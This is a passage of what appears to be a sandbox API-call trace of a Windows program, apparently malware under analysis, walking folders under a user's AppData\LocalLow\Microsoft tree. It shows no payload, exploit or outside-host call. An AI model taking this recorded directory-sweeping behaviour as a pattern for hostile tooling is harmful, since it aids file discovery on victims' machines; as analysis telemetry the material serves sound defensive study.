lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6990 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186060 [0235.744] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0235.744] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.744] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.745] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6950e0 [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695168 [0235.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.745] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.746] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.746] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.746] PathFindFileNameW (pszPath="") returned="" [0235.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.746] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.789] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.790] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0235.790] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.790] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.790] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.790] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0235.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.790] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.791] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.791] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.791] PathFindFileNameW (pszPath="") returned="" [0235.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0235.792] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.792] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.792] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.792] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0235.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.793] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.793] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.793] PathFindFileNameW (pszPath="") returned="" [0235.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0235.799] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.799] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.804] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.805] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.805] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.805] PathFindFileNameW (pszPath="") returned="" [0235.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.805] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.805] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0235.806] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.806] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0235.806] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.807] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.807] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.807] PathFindFileNameW (pszPath="") returned="" [0235.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.813] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.813] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186118 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x31861d0 [0235.813] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185ef0 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0235.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3186060 [0235.813] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0235.814] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.814] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.814] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695168 [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 